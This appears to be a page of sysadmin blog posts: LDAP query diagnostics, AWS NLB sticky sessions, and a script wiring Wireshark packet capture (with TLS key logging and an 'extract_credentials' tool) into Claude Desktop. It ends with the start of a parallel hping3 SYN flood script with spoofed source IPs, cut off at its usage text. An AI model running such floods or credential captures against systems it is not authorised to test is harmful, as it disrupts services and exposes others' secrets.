### Verbose Output
See real-time LDAP statistics while monitoring:
```powershell
.\Diagnose-LDAPQueries.ps1 -Verbose
```
## Requirements
- **Administrator privileges** on the domain controller
- **Windows Server** with Active Directory Domain Services role
- **PowerShell 5.1 or later**
## Understanding the Output
### Log File Example
```
[2025-01-15 14:23:45] [WARNING] === Expensive LDAP Query Detected ===
[2025-01-15 14:23:45] [WARNING] Time: 01/15/2025 14:23:43
[2025-01-15 14:23:45] [WARNING] Client IP: 192.168.1.50
[2025-01-15 14:23:45] [WARNING] Duration: 8.5 seconds
[2025-01-15 14:23:45] [WARNING] Starting Node: DC=contoso,DC=com
[2025-01-15 14:23:45] [WARNING] Filter: (&(objectClass=user)(memberOf=*))
[2025-01-15 14:23:45] [WARNING] Search Scope: 2
[2025-01-15 14:23:45] [WARNING] Visited Entries: 45000
[2025-01-15 14:23:45] [WARNING] Returned Entries: 12000
```
### What to Look For
- **High visited/returned ratio** - Indicates an inefficient filter
- **Subtree searches from root** - Often unnecessarily broad
- **Wildcard filters** - Like `(cn=*)` can be very expensive
- **Unindexed attributes** - Queries on non-indexed attributes visit many entries
- **Repeated queries** - Same client making the same expensive query repeatedly
## Troubleshooting Common Issues
### No Events Appearing
If you're not seeing Event ID 1644, you may need to lower the expensive search threshold in Active Directory:
```powershell
# Lower the threshold to 1000ms (1 second)
Get-ADObject "CN=Query-Policies,CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=yourdomain,DC=com" | 
Set-ADObject -Replace @{lDAPAdminLimits="MaxQueryDuration=1000"}
```
### Script Requires Restart
After enabling Field Engineering logging, you may need to restart the NTDS service:
```powershell
Restart-Service NTDS -Force
```

Best Practices

1. **Run during peak hours** to capture real-world problematic queries
2. **Start with a lower threshold** (2-3 seconds) to catch more queries
3. **Analyze the CSV** in Excel or Power BI for patterns
4. **Correlate with client IPs** to identify problematic applications
5. **Work with application owners** to optimize queries with indexes or better filters

Once you’ve identified expensive queries:

1. **Add indexes** for frequently searched attributes
2. **Optimize LDAP filters** to be more specific
3. **Reduce search scope** where possible
4. **Implement paging** for large result sets
5. **Cache results** on the client side when appropriate

This script has helped me identify numerous performance bottlenecks in production environments. I hope it helps you optimize your Active Directory infrastructure as well!

Deep Dive: AWS NLB Sticky Sessions (stickiness) Setup, Behavior, and Hidden Pitfalls

When you deploy applications behind a Network Load Balancer (NLB) in AWS, you usually expect perfect traffic distribution, fast, fair, and stateless.
But what if your backend holds stateful sessions, like in-memory login sessions, caching, or WebSocket connections and you need a given client to keep hitting the same target every time?

That’s where NLB sticky sessions (also called connection stickiness or source IP affinity) come in. They’re powerful but also misunderstood and misconfiguring them can lead to uneven load, dropped connections, or mysterious client “resets.”

Let’s break down exactly how they work, how to set them up, what to watch for, and how to troubleshoot the tricky edge cases that appear in production.


1. What Are Sticky Sessions on an NLB?

At a high level, sticky sessions ensure that traffic from the same client consistently lands on the same target (EC2 instance, IP, or container) behind your NLB.

Unlike the Application Load Balancer (ALB) — which uses HTTP cookies for stickiness, the NLB operates at Layer 4 (TCP/UDP).
That means it doesn’t look inside your packets. Instead, it bases stickiness on network-level parameters like:

  • Source IP address
  • Destination IP and port
  • Source port (sometimes included in the hash)
  • Protocol (TCP, UDP, or TLS passthrough)

AWS refers to this as “source IP affinity.”
When enabled, the NLB creates a flow-hash mapping that ties the client to a backend target.
As long as the hash remains the same, the same client gets routed to the same target — even across multiple connections.


2. Enabling Sticky Sessions on an AWS NLB

Stickiness is configured per target group, not at the NLB level.

Step-by-Step via AWS Console

  1. Go to EC2 → Load Balancers → Target Groups
    Find the target group your NLB listener uses.
  2. Select the Target Group → Attributes tab
  3. Under Attributes, set:
  • Stickiness.enabled = true
  • Stickiness.type = source_ip
  1. Save changes and confirm the attributes are updated.

Step-by-Step via AWS CLI

```bash
aws elbv2 modify-target-group-attributes \
--target-group-arn arn:aws:elasticloadbalancing:region:acct:targetgroup/mytg/abc123 \
--attributes Key=stickiness.enabled,Value=true Key=stickiness.type,Value=source_ip

How to Verify:

aws elbv2 describe-target-group-attributes \
--target-group-arn arn:aws:elasticloadbalancing:region:acct:targetgroup/mytg/abc123

Sample Output:

{
"Attributes": [
{ "Key": "stickiness.enabled", "Value": "true" },
{ "Key": "stickiness.type", "Value": "source_ip" }
]
}

3. How NLB Stickiness Actually Works (Under the Hood)

The NLB’s flow hashing algorithm calculates a hash from several parameters, often the “five-tuple”:

<protocol, source IP, source port, destination IP, destination port>

The hash is used to choose a target. When stickiness is enabled, NLB remembers this mapping for some time (typically a few minutes to hours, depending on flow expiration).

Key Behavior Points:

  • If the same client connects again using the same IP and port, the hash matches == same backend target.
  • If any part of that tuple changes (e.g. client source port changes), the hash may change == client might hit a different target.
  • NLBs maintain this mapping in memory; if the NLB node restarts or fails over, the mapping is lost.
  • Sticky mappings can also be lost when cross-zone load balancing or target health status changes.

Not Cookie Based

Because NLBs don’t inspect HTTP traffic, there’s no cookie involved.
This means:

  • You can’t set session duration or expiry time like in ALB stickiness.
  • Stickiness only works as long as the same network path and source IP persist.

4. Known Limitations & Edge Cases

Sticky sessions on NLBs are helpful but brittle. Here’s what can go wrong:

IssueCauseEffect
Client source IP changesNAT, VPN, mobile switching networksHash changes → new target
Different source portClient opens multiple sockets or reconnectsEach connection may map differently
TLS termination at NLBNLB terminates TLSStickiness not supported (only for TCP listeners)
Unhealthy targetHealth check failsMapping breaks; NLB reroutes
Cross-zone load balancing toggledDistribution rules changeMay break existing sticky mappings
DNS round-robin at clientNLB has multiple IPs per AZClient DNS resolver may change NLB node
UDP behaviorStateless packets; different flow hashStickiness unreliable for UDP
Scaling up/downNew targets addedHash table rebalanced; some clients remapped

Tip: If you rely on stickiness, keep your clients stable (same IP) and avoid frequent target registration changes.

5. Troubleshooting Sticky Session Problems

When things go wrong, these are the most common patterns you’ll see:

1. “Stickiness not working”

  • Check target group attributes: aws elbv2 describe-target-group-attributes --target-group-arn <arn> Ensure stickiness.enabled is true.
  • Make sure your listener protocol is TCP, not TLS.
  • Confirm that client IPs aren’t being rewritten by NAT or proxy.
  • Check CloudWatch metrics. If one target gets all the traffic, stickiness might be too “sticky” due to limited source IP variety.

2. “Some clients lose session state randomly”

  • Verify client network stability. Mobile clients or corporate proxies can rotate IPs.
  • Confirm health checks aren’t flapping targets.
  • Review your application session design, if session data lives in memory, consider an external session store (Redis, DynamoDB, etc.).

3. “Load imbalance: one instance overloaded”

  • This can happens when many users share one public IP (common in offices or ISPs).
    All those clients hash to the same backend.
  • Mitigate by:
    • Disabling stickiness if not strictly required.
    • Using ALB with cookie based stickiness (more granular).
    • Scaling target capacity.

4. “Connections drop after some time”

  • NLB may remove stale flow mappings.
  • Check TCP keepalive settings on clients and targets. Ensure keepalive_time < NLB idle timeout (350 seconds) to prevent connection resets. Linux commands below:
# Check keepalive time (seconds before sending first keepalive probe)
sysctl net.ipv4.tcp_keepalive_time
# Check keepalive interval (seconds between probes)
sysctl net.ipv4.tcp_keepalive_intvl
# Check keepalive probes (number of probes before giving up)
sysctl net.ipv4.tcp_keepalive_probes
# View all at once
sysctl -a | grep tcp_keepalive
  • Verify idle timeout on backend apps (e.g., web servers closing connections too early).

6. Observability & Testing

You can validate sticky behavior with:

  • CloudWatch metrics:
    ActiveFlowCount, NewFlowCount, and per target request metrics.
  • VPC Flow Logs: confirm that repeated requests from the same client IP go to the same backend ENI.
  • Packet captures: Use tcpdump or ss on your backend instances to see if the same source IP consistently connects.

Quick test with curl:

for i in {1..100}; do 
echo "=== Request $i at $(date) ===" | tee -a curl_test.log
curl http://<nlb-dns-name>/ -v 2>&1 | tee -a curl_test.log
sleep 0.5
done

Run it from the same host and check which backend responds (log hostname on each instance).
Then try from another IP or VPN; you’ll likely see a different target.

7. Best Practices

  1. Only enable stickiness if necessary.
    Stateless applications scale better without it.
  2. If using TLS: terminate TLS at the backend or use ALB if you need session affinity.
  3. Use shared session stores.
    Tools like ElastiCache (Redis) or DynamoDB make scaling simpler and safer.
  4. Avoid toggling cross-zone load balancing during traffic, it resets the sticky map.
  5. Set up proper health checks. Unhealthy targets break affinity immediately.
  6. Monitor uneven load. Large NAT’d user groups can overload a single instance.
  7. For UDP consider designing idempotent stateless processing; sticky sessions may not behave reliably.

8. Example Architecture Pattern

Scenario: A multiplayer game server behind an NLB.
Each player connects via TCP to the game backend that stores their in-memory state.

✅ Recommended setup:

  • Enable stickiness.enabled = true and stickiness.type = source_ip
  • Disable TLS termination at NLB
  • Keep targets in the same AZ with cross-zone load balancing disabled to maintain stable mapping
  • Maintain external health and scaling logic to avoid frequent re-registrations

This setup ensures that the same player IP always lands on the same backend server, as long as their network path is stable.

9. Summary Table

AttributeSupported ValueNotes
stickiness.enabledtrue / falseEnables sticky sessions
stickiness.typesource_ipOnly option for NLB
Supported ProtocolsTCP, UDP (limited)Not supported for TLS listeners
Persistence DurationUntil flow resetNot configurable
Cookie-based Stickiness❌ NoUse ALB for cookie-based
Best forStateful TCP appse.g. games, custom protocols

10. When to Use ALB Instead

If you’re dealing with HTTP/HTTPS applications that manage user sessions via cookies or tokens, you’ll be much happier using an Application Load Balancer.
It offers:

  • Configurable cookie duration
  • Per application stickiness
  • Layer 7 routing and metrics

The NLB should be reserved for high performance, low latency, or non HTTP workloads that need raw TCP/UDP handling.

11. Closing Thoughts

AWS NLB sticky sessions are a great feature, but they’re not magic glue.
They work well when your network topology and client IPs are predictable, and your app genuinely needs flow affinity. However, if your environment involves NATs, mobile networks, or frequent scale-ups, expect surprises.

When in doubt:
1. Keep your app stateless,
2. Let the load balancer do its job, and
3. Use stickiness only as a last resort for legacy or session bound systems.

🧩 References

Macbook: Setup wireshark packet capture MCP for Antropic Claude Desktop

If you’re like me, the idea of doing anything twice will make you break out in a cold shiver. For my Claude desktop, I often need network pcap (packet capture) to unpack something that I am doing. So the script below installs wireshark, and then the wireshark mcp and then configures Claude to use it. Then I got it to work with zscaler (note, I just did a process grep – you could also check utun/port 9000/9400).

I also added example scripts to test its working and so prompts to help you test in Claude.

cat > ~/setup_wiremcp_simple.sh << 'EOF'
#!/bin/bash
# Simplified WireMCP Setup with Zscaler Support
echo ""
echo "============================================"
echo "   WireMCP Setup with Zscaler Support"
echo "============================================"
echo ""
# Detect Zscaler
echo "[INFO] Detecting Zscaler..."
ZSCALER_DETECTED=false
ZSCALER_INTERFACE=""
# Check for Zscaler process
if pgrep -f "Zscaler" >/dev/null 2>&1; then
ZSCALER_DETECTED=true
echo "[ZSCALER] ✓ Zscaler process is running"
fi
# Find Zscaler tunnel interface
UTUN_INTERFACES=$(ifconfig -l | grep -o 'utun[0-9]*')
for iface in $UTUN_INTERFACES; do
IP=$(ifconfig "$iface" 2>/dev/null | grep "inet " | awk '{print $2}')
if [[ "$IP" == 100.64.* ]]; then
ZSCALER_INTERFACE="$iface"
ZSCALER_DETECTED=true
echo "[ZSCALER] ✓ Zscaler tunnel found: $iface (IP: $IP)"
break
fi
done
if [[ "$ZSCALER_DETECTED" == "true" ]]; then
echo "[ZSCALER] ✓ Zscaler environment confirmed"
else
echo "[INFO] No Zscaler detected - standard network"
fi
echo ""
# Check existing installations
echo "[INFO] Checking installed software..."
if command -v tshark >/dev/null 2>&1; then
echo "[✓] Wireshark/tshark is installed"
else
echo "[!] Wireshark not found - install with: brew install --cask wireshark"
fi
if command -v node >/dev/null 2>&1; then
echo "[✓] Node.js is installed: $(node --version)"
else
echo "[!] Node.js not found - install with: brew install node"
fi
if [[ -d "$HOME/WireMCP" ]]; then
echo "[✓] WireMCP is installed at ~/WireMCP"
else
echo "[!] WireMCP not found"
fi
echo ""
# Configure SSL decryption for Zscaler
if [[ "$ZSCALER_DETECTED" == "true" ]]; then
echo "[INFO] Configuring SSL/TLS decryption..."
SSL_KEYLOG="$HOME/.wireshark-sslkeys.log"
touch "$SSL_KEYLOG"
chmod 600 "$SSL_KEYLOG"
if ! grep -q "SSLKEYLOGFILE" ~/.zshrc 2>/dev/null; then
echo "" >> ~/.zshrc
echo "# Wireshark SSL/TLS decryption for Zscaler" >> ~/.zshrc
echo "export SSLKEYLOGFILE=\"$SSL_KEYLOG\"" >> ~/.zshrc
echo "[✓] Added SSLKEYLOGFILE to ~/.zshrc"
else
echo "[✓] SSLKEYLOGFILE already in ~/.zshrc"
fi
echo "[✓] SSL key log file: $SSL_KEYLOG"
fi
echo ""
# Update WireMCP for Zscaler
if [[ -d "$HOME/WireMCP" ]]; then
if [[ "$ZSCALER_DETECTED" == "true" ]]; then
echo "[INFO] Creating Zscaler-aware wrapper..."
cat > "$HOME/WireMCP/start_zscaler.sh" << 'WRAPPER'
#!/bin/bash
echo "=== WireMCP (Zscaler Mode) ==="
# Set SSL decryption
export SSLKEYLOGFILE="$HOME/.wireshark-sslkeys.log"
# Find Zscaler interface
UTUN_LIST=$(ifconfig -l | grep -o 'utun[0-9]*')
for iface in $UTUN_LIST; do
IP=$(ifconfig "$iface" 2>/dev/null | grep "inet " | awk '{print $2}')
if [[ "$IP" == 100.64.* ]]; then
export CAPTURE_INTERFACE="$iface"
echo "✓ Zscaler tunnel: $iface ($IP)"
echo "✓ All proxied traffic flows through this interface"
break
fi
done
if [[ -z "$CAPTURE_INTERFACE" ]]; then
export CAPTURE_INTERFACE="en0"
echo "! Using default interface: en0"
fi
echo ""
echo "Configuration:"
echo "  SSL Key Log: $SSLKEYLOGFILE"
echo "  Capture Interface: $CAPTURE_INTERFACE"
echo ""
echo "To capture: sudo tshark -i $CAPTURE_INTERFACE -c 10"
echo "===============================\n"
cd "$(dirname "$0")"
node index.js
WRAPPER
chmod +x "$HOME/WireMCP/start_zscaler.sh"
echo "[✓] Created ~/WireMCP/start_zscaler.sh"
fi
# Create test script
cat > "$HOME/WireMCP/test_zscaler.sh" << 'TEST'
#!/bin/bash
echo "=== Zscaler & WireMCP Test ==="
echo ""
# Check Zscaler process
if pgrep -f "Zscaler" >/dev/null; then
echo "✓ Zscaler is running"
else
echo "✗ Zscaler not running"
fi
# Find tunnel
UTUN_LIST=$(ifconfig -l | grep -o 'utun[0-9]*')
for iface in $UTUN_LIST; do
IP=$(ifconfig "$iface" 2>/dev/null | grep "inet " | awk '{print $2}')
if [[ "$IP" == 100.64.* ]]; then
echo "✓ Zscaler tunnel: $iface ($IP)"
FOUND=true
break
fi
done
[[ "$FOUND" != "true" ]] && echo "✗ No Zscaler tunnel found"
echo ""
# Check SSL keylog
if [[ -f "$HOME/.wireshark-sslkeys.log" ]]; then
SIZE=$(wc -c < "$HOME/.wireshark-sslkeys.log")
echo "✓ SSL key log exists ($SIZE bytes)"
else
echo "✗ SSL key log not found"
fi
echo ""
echo "Network interfaces:"
tshark -D 2>/dev/null | head -5
echo ""
echo "To capture Zscaler traffic:"
echo "  sudo tshark -i ${iface:-en0} -c 10"
TEST
chmod +x "$HOME/WireMCP/test_zscaler.sh"
echo "[✓] Created ~/WireMCP/test_zscaler.sh"
fi
echo ""
# Configure Claude Desktop
CLAUDE_CONFIG="$HOME/Library/Application Support/Claude/claude_desktop_config.json"
if [[ -d "$(dirname "$CLAUDE_CONFIG")" ]]; then
echo "[INFO] Configuring Claude Desktop..."
# Backup existing
if [[ -f "$CLAUDE_CONFIG" ]]; then
BACKUP_FILE="${CLAUDE_CONFIG}.backup.$(date +%Y%m%d_%H%M%S)"
cp "$CLAUDE_CONFIG" "$BACKUP_FILE"
echo "[✓] Backup created: $BACKUP_FILE"
fi
# Check if jq is installed
if ! command -v jq >/dev/null 2>&1; then
echo "[INFO] Installing jq for JSON manipulation..."
brew install jq
fi
# Create temp capture directory
TEMP_CAPTURE_DIR="$HOME/.wiremcp/captures"
mkdir -p "$TEMP_CAPTURE_DIR"
echo "[✓] Capture directory: $TEMP_CAPTURE_DIR"
# Prepare environment variables
if [[ "$ZSCALER_DETECTED" == "true" ]]; then
ENV_JSON=$(jq -n \
--arg ssllog "$HOME/.wireshark-sslkeys.log" \
--arg iface "${ZSCALER_INTERFACE:-en0}" \
--arg capdir "$TEMP_CAPTURE_DIR" \
'{"SSLKEYLOGFILE": $ssllog, "CAPTURE_INTERFACE": $iface, "ZSCALER_MODE": "true", "CAPTURE_DIR": $capdir}')
else
ENV_JSON=$(jq -n \
--arg capdir "$TEMP_CAPTURE_DIR" \
'{"CAPTURE_DIR": $capdir}')
fi
# Add or update wiremcp in config, preserving existing servers
if [[ -f "$CLAUDE_CONFIG" ]] && [[ -s "$CLAUDE_CONFIG" ]]; then
echo "[INFO] Merging WireMCP into existing config..."
jq --arg home "$HOME" \
--argjson env "$ENV_JSON" \
'.mcpServers.wiremcp = {"command": "node", "args": [$home + "/WireMCP/index.js"], "env": $env}' \
"$CLAUDE_CONFIG" > "${CLAUDE_CONFIG}.tmp" && mv "${CLAUDE_CONFIG}.tmp" "$CLAUDE_CONFIG"
else
echo "[INFO] Creating new Claude config..."
jq -n --arg home "$HOME" \
--argjson env "$ENV_JSON" \
'{"mcpServers": {"wiremcp": {"command": "node", "args": [$home + "/WireMCP/index.js"], "env": $env}}}' \
> "$CLAUDE_CONFIG"
fi
if [[ "$ZSCALER_DETECTED" == "true" ]]; then
echo "[✓] Claude configured with Zscaler mode"
else
echo "[✓] Claude configured"
fi
echo "[✓] Existing MCP servers preserved"
fi
echo ""
echo "============================================"
echo "             Summary"
echo "============================================"
echo ""
if [[ "$ZSCALER_DETECTED" == "true" ]]; then
echo "Zscaler Environment:"
echo "  ✓ Detected and configured"
[[ -n "$ZSCALER_INTERFACE" ]] && echo "  ✓ Tunnel interface: $ZSCALER_INTERFACE"
echo "  ✓ SSL decryption ready"
echo ""
echo "Next steps:"
echo "  1. Restart terminal: source ~/.zshrc"
echo "  2. Restart browsers for HTTPS decryption"
else
echo "Standard Network:"
echo "  • No Zscaler detected"
echo "  • Standard configuration applied"
fi
echo ""
echo "For Claude Desktop:"
echo "  1. Restart Claude Desktop app"
echo "  2. Ask Claude to analyze network traffic"
echo ""
echo "============================================"
exit 0
EOF
chmod +x ~/setup_wiremcp_simple.sh

To test if the script worked:

cat > ~/test_wiremcp_claude.sh << 'EOF'
#!/bin/bash
# WireMCP Claude Desktop Interactive Test Script
echo "╔════════════════════════════════════════════════════════╗"
echo "║     WireMCP + Claude Desktop Testing Tool             ║"
echo "╚════════════════════════════════════════════════════════╝"
echo ""
# Colors
GREEN='\033[0;32m'
BLUE='\033[0;34m'
YELLOW='\033[1;33m'
NC='\033[0m'
# Check prerequisites
echo -e "${BLUE}[1/4]${NC} Checking prerequisites..."
if ! command -v tshark >/dev/null 2>&1; then
echo "   ✗ tshark not found"
exit 1
fi
if [[ ! -d "$HOME/WireMCP" ]]; then
echo "   ✗ WireMCP not found at ~/WireMCP"
exit 1
fi
if [[ ! -f "$HOME/Library/Application Support/Claude/claude_desktop_config.json" ]]; then
echo "   ⚠ Claude Desktop config not found"
fi
echo -e "   ${GREEN}✓${NC} All prerequisites met"
echo ""
# Detect Zscaler
echo -e "${BLUE}[2/4]${NC} Detecting network configuration..."
ZSCALER_IF=""
for iface in $(ifconfig -l | grep -o 'utun[0-9]*'); do
IP=$(ifconfig "$iface" 2>/dev/null | grep "inet " | awk '{print $2}')
if [[ "$IP" == 100.64.* ]]; then
ZSCALER_IF="$iface"
echo -e "   ${GREEN}✓${NC} Zscaler tunnel: $iface ($IP)"
break
fi
done
if [[ -z "$ZSCALER_IF" ]]; then
echo "   ⚠ No Zscaler tunnel detected (will use en0)"
ZSCALER_IF="en0"
fi
echo ""
# Generate test traffic
echo -e "${BLUE}[3/4]${NC} Generating test network traffic..."
# Background network requests
(curl -s https://api.github.com/zen > /dev/null 2>&1) &
(curl -s https://httpbin.org/get > /dev/null 2>&1) &
(curl -s https://www.google.com > /dev/null 2>&1) &
(ping -c 3 8.8.8.8 > /dev/null 2>&1) &
sleep 2
echo -e "   ${GREEN}✓${NC} Test traffic generated (GitHub, httpbin, Google, DNS)"
echo ""
# Show test prompts
echo -e "${BLUE}[4/4]${NC} Test prompts for Claude Desktop"
echo "════════════════════════════════════════════════════════"
echo ""
echo -e "${YELLOW}📋 Copy these prompts into Claude Desktop:${NC}"
echo ""
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 1: Basic Connection Test"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Can you see the WireMCP tools? List all available network analysis capabilities you have access to.
EOF
echo ""
echo "Expected: Claude should list 7 tools (capture_packets, get_summary_stats, etc.)"
echo ""
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 2: Simple Packet Capture"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Capture 20 network packets and show me a summary including:
- Source and destination IPs
- Protocols used
- Port numbers
- Any interesting patterns
EOF
echo ""
echo "Expected: Packets from $ZSCALER_IF with IPs in 100.64.x.x range"
echo ""
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 3: Protocol Analysis"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Capture 50 packets and show me:
1. Protocol breakdown (TCP, UDP, DNS, HTTP, TLS)
2. Which protocol is most common
3. Protocol hierarchy statistics
EOF
echo ""
echo "Expected: Protocol percentages and hierarchy tree"
echo ""
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 4: Connection Analysis"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Capture 100 packets and show me network conversations:
- Top 5 source/destination pairs
- Number of packets per conversation
- Bytes transferred
EOF
echo ""
echo "Expected: Conversation statistics with packet/byte counts"
echo ""
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 5: Threat Detection"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Capture traffic for 30 seconds and check all destination IPs against threat databases. Tell me if any malicious IPs are detected.
EOF
echo ""
echo "Expected: List of IPs and threat check results (should show 'No threats')"
echo ""
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 6: HTTPS Decryption (Advanced)"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "⚠️  First: Restart your browser after running this:"
echo "    source ~/.zshrc && echo \$SSLKEYLOGFILE"
echo ""
cat << 'EOF'
Capture 30 packets while I browse some HTTPS websites. Can you see any HTTP hostnames or request URIs from the HTTPS traffic?
EOF
echo ""
echo "Expected: If SSL keys are logged, Claude sees decrypted HTTP data"
echo ""
echo "════════════════════════════════════════════════════════"
echo ""
echo -e "${YELLOW}🔧 Manual Verification Commands:${NC}"
echo ""
echo "  # Test manual capture:"
echo "  sudo tshark -i $ZSCALER_IF -c 10"
echo ""
echo "  # Check SSL keylog:"
echo "  ls -lh ~/.wireshark-sslkeys.log"
echo ""
echo "  # Test WireMCP server:"
echo "  cd ~/WireMCP && timeout 3 node index.js"
echo ""
echo "  # Check Claude config:"
echo "  cat \"\$HOME/Library/Application Support/Claude/claude_desktop_config.json\""
echo ""
echo "════════════════════════════════════════════════════════"
echo ""
echo -e "${GREEN}✅ Test setup complete!${NC}"
echo ""
echo "Next steps:"
echo "  1. Open Claude Desktop"
echo "  2. Copy/paste the test prompts above"
echo "  3. Verify Claude can access WireMCP tools"
echo "  4. Check ~/WIREMCP_TESTING_EXAMPLES.md for more examples"
echo ""
# Keep generating traffic in background
echo "Keeping test traffic active for 2 minutes..."
echo "(You can Ctrl+C to stop)"
echo ""
# Generate continuous light traffic
for i in {1..24}; do
(curl -s https://httpbin.org/delay/1 > /dev/null 2>&1) &
sleep 5
done
echo ""
echo "Traffic generation complete!"
echo ""
EOF
chmod +x ~/test_wiremcp_claude.sh

Now that you have tested everything is fine… the below just gives you a few example tests to carry out.

# Try WireMCP Right Now! 🚀
## 🎯 3-Minute Quick Start
### Step 1: Restart Claude Desktop (30 seconds)
```bash
# Kill and restart Claude
killall Claude
sleep 2
open -a Claude
```
### Step 2: Create a script to Generate Some Traffic (30 seconds)
cat > ~/network_activity_loop.sh << 'EOF'
#!/bin/bash
# Script to generate network activity for 30 seconds
# Useful for testing network capture tools
echo "Starting network activity generation for 30 seconds..."
echo "Press Ctrl+C to stop early if needed"
# Record start time
start_time=$(date +%s)
end_time=$((start_time + 30))
# Counter for requests
request_count=0
# Loop for 30 seconds
while [ $(date +%s) -lt $end_time ]; do
# Create network activity to capture
echo -n "Request set #$((++request_count)) at $(date +%T): "
# GitHub API call
curl -s https://api.github.com/users/octocat > /dev/null 2>&1 &
# HTTPBin JSON endpoint
curl -s https://httpbin.org/json > /dev/null 2>&1 &
# IP address check
curl -s https://ifconfig.me > /dev/null 2>&1 &
# Wait for background jobs to complete
wait
echo "completed"
# Small delay to avoid overwhelming the servers
sleep 0.5
done
echo ""
echo "Network activity generation completed!"
echo "Total request sets sent: $request_count"
echo "Duration: 30 seconds"
EOF
chmod +x ~/network_activity_loop.sh
# Call the script
./network_activity_loop.sh 

Time to play!

Now open Claude Desktop and we can run a few tests…

  1. Ask Claude:

Can you see the WireMCP tools? List all available network analysis capabilities.

Claude should list 7 tools:
– capture_packets
– get_summary_stats
– get_conversations
– check_threats
– check_ip_threats
– analyze_pcap
– extract_credentials

2. Ask Claude:

Capture 20 network packets and tell me:
– What IPs am I talking to?
– What protocols are being used?
– Anything interesting?

3. In terminal run:

```bash
curl -v https://api.github.com/users/octocat
```

Ask Claude:

I just called api.github.com. Can you capture my network traffic
for 10 seconds and tell me:
1. What IP did GitHub resolve to?
2. How long did the connection take?
3. Were there any errors?

4. Ask Claude:

Monitor my network for 30 seconds and show me:
– Top 5 destinations by packet count
– What services/companies am I connecting to?
– Any unexpected connections?

5. Developer Debugging Examples – Debug Slow API. Ask Claude:

I’m calling myapi.company.com and it feels slow.
Capture traffic for 30 seconds while I make a request and tell me:
– Where is the latency coming from?
– DNS, TCP handshake, TLS, or server response?
– Any retransmissions?

6. Developer Debugging Examples – Debug Connection Timeout. Ask Claude:

I’m getting timeouts to db.example.com:5432.
Capture for 30 seconds and tell me:
1. Is DNS resolving?
2. Are SYN packets being sent?
3. Do I get SYN-ACK back?
4. Any firewall blocking?

7. TLS Handshake failures (often happen with zero trust networks and cert pinning). Ask Claude:

Monitor my network for 2 mins and look for abnormal TLS handshakes, in particular shortlived TLS handshakes, which can occur due to cert pinning issues.

8. Check for Threats. Ask Claude:

Monitor my network for 60 seconds and check all destination
IPs against threat databases. Tell me if anything suspicious.

9. Monitor Background Apps. Ask Claude:

Capture traffic for 30 seconds while I’m idle.
What apps are calling home without me knowing? Only get conversation statistics to show the key connections and the amount of traffic through each. Show any failed traffic or unusual traffic patterns

10. VPN Testing. Ask Claude:

Capture packets for 60 seconds, during which time i will enable my VPN. Compare the difference and see if you can see exactly when my VPN was enabled.

11. Audit traffic. Ask Claude:

Monitor for 5 minutes and tell me:
– Which service used most bandwidth?
– Any large file transfers?
– Unexpected data usage?

12. Looking for specific protocols. Ask Claude:

Monitor my traffic for 30 seconds and see if you can spot any traffic using QUIC and give me statistics on it.

(then go open a youtube website)

13. DNS Queries. Ask Claude:

As a network troubleshooter, analyze all DNS queries for 30 seconds and provide potential causes for any errors. Show me detailed metrics on any calls, especially failed calls or unusual DNS patterns (like NXDOMAIN, PTR or TXT calls)

14. Certificate Issues. Ask Claude:

Capture TLS handshakes for the next minute and show me the certificate chain. Look out for failed/short live TLS sessions

What Makes This Powerful?

The tradition way used to be:

“`bash
sudo tcpdump -i utun5 -w capture.pcap
# Wait…
# Stop capture
# Open Wireshark
# Apply filters
# Analyze packets manually
# Figure out what it means
“`
Time: 10-30 minutes!

With WireMCP + Claude:


“Capture my network traffic and tell me
what’s happening in plain English”

Time: 30 seconds

Claude automatically:
– Captures on correct interface (utun5)
– Filters relevant packets
– Analyzes protocols
– Identifies issues
– Explains in human language
– Provides recommendations

Testing your sites SYN flood resistance using hping3 in parallel

A SYN flood test using hping3 that allows you to specify the number of SYN packets to send and scales horizontally with a specific number of processes can be created using a Bash script with the xargs command. This approach allows you to distribute the workload across multiple processes for better performance.

The Script

This script uses hping3 to perform a SYN flood attack with a configurable packet count and number of parallel processes.

cat > ./syn_flood_parallel.sh << 'EOF'
#!/bin/bash
# A simple script to perform a SYN flood test using hping3,
# with configurable packet count, parallel processes, and optional source IP randomization.
# --- Configuration ---
TARGET_IP=$1
TARGET_PORT=$2
PACKET_COUNT_TOTAL=$3
PROCESSES=$4
RANDOMIZE_SOURCE=${5:-true}  # Default to true if not specified
# --- Usage Message ---
if [ -z "$TARGET_IP" ] || [ -z "$TARGET_PORT" ] || [ -z "$PACKET_COUNT_TOTAL" ] || [ -z "$PROCESSES" ]; then
echo "Usage: $0 <TARGET_IP> <TARGET_PORT> <PACKET_COUNT_TOTAL> <PROCESSES> [RANDOMIZE_SOURCE]"
echo ""
echo "Parameters:"
echo "  TARGET_IP           - Target IP address or hostname"
echo "  TARGET_PORT         - Target port number (1-65535)"
echo "  PACKET_COUNT_TOTAL  - Total number of SYN packets to send"
echo "  PROCESSES           - Number of parallel processes (2-10 recommended)"
echo "  RANDOMIZE_SOURCE    - true/false (optional, default: true)"
echo ""
echo "Examples:"
